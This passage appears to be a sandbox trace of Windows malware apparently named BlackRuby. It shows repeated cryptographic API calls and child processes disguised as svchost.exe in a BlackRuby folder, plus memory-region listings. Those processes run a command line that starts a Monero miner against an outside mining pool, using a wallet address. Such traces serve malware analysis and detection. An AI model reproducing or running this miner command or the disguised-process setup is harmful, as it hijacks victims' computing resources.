(hProv=0x37c818, dwFlags=0x0) returned 1 [0061.021] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.022] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.022] CryptDestroyKey (hKey=0x360e60) returned 1 [0061.022] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.130] CryptDestroyKey (hKey=0x3609e0) returned 1 [0061.130] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.130] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.131] CryptDestroyKey (hKey=0x360aa0) returned 1 [0061.131] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.131] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.208] CryptDestroyKey (hKey=0x360fa0) returned 1 [0061.208] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.208] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.209] CryptDestroyKey (hKey=0x360ee0) returned 1 [0061.209] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.209] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.298] CryptDestroyKey (hKey=0x360aa0) returned 1 [0061.298] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.298] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.298] CryptDestroyKey (hKey=0x360f60) returned 1 [0061.298] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.298] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.299] CryptDestroyKey (hKey=0x360ae0) returned 1 [0061.299] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.299] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.421] CryptDestroyKey (hKey=0x360ae0) returned 1 [0061.421] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.421] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.422] CryptDestroyKey (hKey=0x360f60) returned 1 [0061.422] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.422] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.518] CryptDestroyKey (hKey=0x360c20) returned 1 [0061.518] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.518] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.519] CryptDestroyKey (hKey=0x360ee0) returned 1 [0061.519] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.519] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.519] CryptDestroyKey (hKey=0x360e60) returned 1 [0061.519] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.520] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.658] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.659] CryptDestroyKey (hKey=0x360fa0) returned 1 [0061.659] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.659] CryptDestroyKey (hKey=0x360de0) returned 1 [0061.659] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.659] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.816] CryptDestroyKey (hKey=0x360d60) returned 1 [0061.816] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.816] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.816] CryptDestroyKey (hKey=0x360ae0) returned 1 [0061.816] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.817] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.951] CryptDestroyKey (hKey=0x360ae0) returned 1 [0061.951] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0061.951] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0061.951] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.952] CryptDestroyKey (hKey=0x360d60) returned 1 [0061.952] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0062.047] CryptDestroyKey (hKey=0x360f20) returned 1 [0062.047] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0062.047] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0062.048] CryptDestroyKey (hKey=0x360c20) returned 1 [0062.048] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.048] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.048] CryptDestroyKey (hKey=0x360d20) returned 1 [0062.048] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.048] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.124] CryptDestroyKey (hKey=0x360ae0) returned 1 [0062.124] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.124] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.124] CryptDestroyKey (hKey=0x360c20) returned 1 [0062.124] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.125] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.231] CryptDestroyKey (hKey=0x360d20) returned 1 [0062.231] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.231] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.232] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.232] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.232] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.325] CryptDestroyKey (hKey=0x360d20) returned 1 [0062.325] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.325] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.326] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0062.326] CryptDestroyKey (hKey=0x360ce0) returned 1 [0062.326] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0062.326] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.326] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.327] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.428] CryptDestroyKey (hKey=0x360ae0) returned 1 [0062.428] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.428] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.429] CryptDestroyKey (hKey=0x360a20) returned 1 [0062.429] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.429] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.553] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.554] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.554] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.554] CryptDestroyKey (hKey=0x360ae0) returned 1 [0062.554] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.554] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.675] CryptDestroyKey (hKey=0x360f60) returned 1 [0062.675] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.675] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.676] CryptDestroyKey (hKey=0x360f20) returned 1 [0062.676] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.676] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.676] CryptDestroyKey (hKey=0x360aa0) returned 1 [0062.676] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.676] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.855] CryptDestroyKey (hKey=0x360fa0) returned 1 [0062.855] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.855] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.856] CryptDestroyKey (hKey=0x360e20) returned 1 [0062.856] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.856] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.990] CryptDestroyKey (hKey=0x360e20) returned 1 [0062.990] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.990] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.990] CryptDestroyKey (hKey=0x3609e0) returned 1 [0062.990] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0062.991] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0062.991] CryptDestroyKey (hKey=0x360ce0) returned 1 [0062.991] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.991] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.080] CryptDestroyKey (hKey=0x360ee0) returned 1 [0063.080] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.080] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.080] CryptDestroyKey (hKey=0x360aa0) returned 1 [0063.080] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.080] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.191] CryptDestroyKey (hKey=0x360aa0) returned 1 [0063.191] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.191] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.192] CryptDestroyKey (hKey=0x360ee0) returned 1 [0063.192] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.192] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.307] CryptDestroyKey (hKey=0x3609e0) returned 1 [0063.307] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.307] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.308] CryptDestroyKey (hKey=0x360e20) returned 1 [0063.308] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.308] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.308] CryptDestroyKey (hKey=0x360b60) returned 1 [0063.308] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.308] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.402] CryptDestroyKey (hKey=0x360aa0) returned 1 [0063.402] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.402] CryptDestroyKey (hKey=0x360a20) returned 1 [0063.402] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.402] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.402] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.484] CryptDestroyKey (hKey=0x360b20) returned 1 [0063.484] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.484] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.485] CryptDestroyKey (hKey=0x360ae0) returned 1 [0063.485] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.485] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.485] CryptDestroyKey (hKey=0x360ee0) returned 1 [0063.485] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.485] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.594] CryptDestroyKey (hKey=0x360ea0) returned 1 [0063.594] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.594] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.595] CryptDestroyKey (hKey=0x360a20) returned 1 [0063.595] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.595] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 Thread: id = 4 os_tid = 0x9f8 Thread: id = 5 os_tid = 0x9fc Thread: id = 6 os_tid = 0xa00 Thread: id = 7 os_tid = 0xa04 Thread: id = 8 os_tid = 0xa08 [0029.014] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0029.018] ResetEvent (hEvent=0x1b4) returned 1 [0029.018] GetLastError () returned 0x0 Thread: id = 9 os_tid = 0xa0c Thread: id = 10 os_tid = 0xa18 Thread: id = 12 os_tid = 0xaf4 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\blackruby\\svchost.exe" page_root = "0x7ee363e0" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9e0" cmd_line = "\"C:\\Windows\\System32\\BlackRuby\\Svchost.exe\" -o stratum+tcp://de01.supportxmr.com:3333 -u 43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7" cur_dir = "C:\\Windows\\system32\\BlackRuby\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ee48" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 318 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 319 start_va = 0x30000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 320 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 321 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 322 start_va = 0x400000 end_va = 0x50afff entry_point = 0x400000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\BlackRuby\\Svchost.exe" (normalized: "c:\\windows\\system32\\blackruby\\svchost.exe") Region: id = 323 start_va = 0x77320000 end_va = 0x7745bfff entry_point = 0x77320000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 324 start_va = 0x77560000 end_va = 0x77560fff entry_point = 0x77560000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 325 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 326 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 327 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 328 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 329 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 330 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 331 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 332 start_va = 0x510000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 333 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 334 start_va = 0x736c0000 end_va = 0x736c6fff entry_point = 0x736c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 335 start_va = 0x736d0000 end_va = 0x736ebfff entry_point = 0x736d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 336 start_va = 0x74b20000 end_va = 0x74b36fff entry_point = 0x74b20000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 337 start_va = 0x75470000 end_va = 0x7547afff entry_point = 0x75470000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 338 start_va = 0x75570000 end_va = 0x755b9fff entry_point = 0x75570000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 339 start_va = 0x75770000 end_va = 0x75838fff entry_point = 0x75770000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 340 start_va = 0x75890000 end_va = 0x758ddfff entry_point = 0x75890000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 341 start_va = 0x75c80000 end_va = 0x75d20fff entry_point = 0x75c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 342 start_va = 0x75f60000 end_va = 0x75f69fff entry_point = 0x75f60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 343 start_va = 0x75f70000 end_va = 0x75f88fff entry_point = 0x75f70000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 344 start_va = 0x75f90000 end_va = 0x7602ffff entry_point = 0x75f90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 345 start_va = 0x76030000 end_va = 0x76064fff entry_point = 0x76030000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 346 start_va = 0x76070000 end_va = 0x7611bfff entry_point = 0x76070000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 347 start_va = 0x76120000 end_va = 0x76125fff entry_point = 0x76120000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 348 start_va = 0x76360000 end_va = 0x763fcfff entry_point = 0x76360000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 349 start_va = 0x77240000 end_va = 0x77313fff entry_point = 0x77240000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 350 start_va = 0x774e0000 end_va = 0x774e4fff entry_point = 0x774e0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 351 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 352 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 353 start_va = 0x710000 end_va = 0x7d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 354 start_va = 0x758f0000 end_va = 0x7590efff entry_point = 0x758f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 355 start_va = 0x76130000 end_va = 0x761fbfff entry_point = 0x76130000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 11 os_tid = 0xad8 Thread: id = 13 os_tid = 0xb38 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\blackruby\\svchost.exe" page_root = "0x7ee36660" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9e0" cmd_line = "\"C:\\Windows\\System32\\BlackRuby\\Svchost.exe\" -o stratum+tcp://de01.supportxmr.com:3333 -u 43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7" cur_dir = "C:\\Windows\\system32\\BlackRuby\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ee48" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 359 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 360 start_va = 0x30000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 361 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 362 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 363 start_va = 0x400000 end_va = 0x50afff entry_point = 0x400000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\BlackRuby\\Svchost.exe" (normalized: "c:\\windows\\system32\\blackruby\\svchost.exe") Region: id = 364 start_va = 0x510000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 365 start_va = 0x77320000 end_va = 0x7745bfff entry_point = 0x77320000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 366 start_va = 0x77560000 end_va = 0x77560fff entry_point = 0x77560000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 367 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 368 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 369 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 370 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 371 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 372 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 373 start_va = 0x8a0000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 374 start_va = 0x75570000 end_va = 0x755b9fff entry_point = 0x75570000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 375 start_va = 0x77240000 end_va = 0x77313fff entry_point = 0x77240000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 376 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 14 os_tid = 0xb50 Thread: id = 15 os_tid = 0xb48